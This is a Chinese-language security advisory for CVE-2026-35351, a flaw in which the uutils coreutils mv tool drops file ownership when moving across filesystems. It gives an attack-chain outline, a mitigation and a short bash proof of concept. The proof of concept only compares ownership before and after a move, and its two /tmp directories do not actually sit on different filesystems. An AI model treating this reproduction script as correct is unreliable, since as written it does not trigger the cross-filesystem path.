CVE-2026-35351 CVSS 4.2 中危

CVE-2026-35351: uutils coreutils mv工具文件所有权丢失漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35351

漏洞类型

权限管理错误

CVSS评分

4.2 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

uutils coreutils

漏洞概述

uutils coreutils中的mv工具存在安全漏洞，当跨不同文件系统移动文件时，无法保留原始文件的所有权信息。该工具回退到复制并删除的例程，导致目标文件以调用者的UID/GID创建，而非源文件元数据。此漏洞可能导致特权用户（如root）移动的文件意外变为root所有，引发信息泄露或原所有者无法访问，严重破坏备份和迁移操作的安全性。

技术细节

该漏洞源于uutils coreutils中mv工具在处理跨文件系统边界移动文件时的逻辑缺陷。在Unix/Linux系统中，同文件系统内的移动通常通过修改目录项引用来实现，能完美保留文件的元数据（包括UID/GID）。然而，当源路径和目标路径位于不同文件系统时，mv工具必须回退到“复制源文件到目标，然后删除源文件”的策略。问题在于，uutils的实现在此过程中未正确执行`chown`系统调用来恢复源文件的所有权信息，导致新创建的目标文件默认继承执行mv命令的用户（通常是root）身份。这造成了文件所有权的非预期变更，破坏了原有的访问控制模型，可能导致非特权用户丢失数据访问权或敏感数据泄露。

攻击链分析

STEP 1

环境准备

攻击者或管理员在系统上配置位于不同文件系统挂载点的源目录和目标目录。

STEP 2

文件创建

普通用户在源文件系统中创建文件，该文件具有特定的UID/GID所有权。

STEP 3

触发移动

具有高权限（如root）的用户执行uutils coreutils的mv命令，尝试将文件从源文件系统移动到目标文件系统。

STEP 4

利用漏洞

mv工具检测到跨文件系统移动，触发复制并删除逻辑，但在复制后未能执行chown恢复所有权。

STEP 5

造成影响

目标文件的所有权变为执行移动命令的高权限用户，导致原所有者无法访问，造成拒绝服务或权限混乱。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-35351: uutils coreutils mv ownership preservation issue
# Scenario: Moving a file from one filesystem to another using uutils mv

# Setup: Create two directories on different filesystems (simulated)
SRC_FS="/tmp/source_fs"
DST_FS="/tmp/dest_fs"

# Create test file as a non-root user (e.g., user 'nobody')
sudo -u nobody touch "$SRC_FS/testfile.txt"
echo "[+] Original file ownership:"
ls -l "$SRC_FS/testfile.txt"

# Execute the move as root across filesystem boundaries
# This mimics an admin moving data, triggering the vulnerable copy-and-delete path
./uutils-mv "$SRC_FS/testfile.txt" "$DST_FS/testfile.txt"

echo "[+] File ownership after move:"
ls -l "$DST_FS/testfile.txt"

# Expected Vulnerable Result: The file is now owned by root, not nobody
# Expected Correct Result: The file should still be owned by nobody

影响范围

uutils coreutils (具体受影响版本请参考GitHub Issue #9714)

防御指南

临时缓解措施

避免使用uutils coreutils的mv工具进行跨文件系统的文件移动操作。如果必须移动，请移动后在手动使用`chown`命令恢复文件的所有权。或者暂时回退到使用系统原生的GNU coreutils工具包。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-35351
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-35351
3 Details https://www.cvedetails.com/cve/CVE-2026-35351/
4 VulDB https://vuldb.com/cve/CVE-2026-35351
5 Link https://github.com/uutils/coreutils/issues/9714
6 Link https://github.com/uutils/coreutils/issues/9714

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表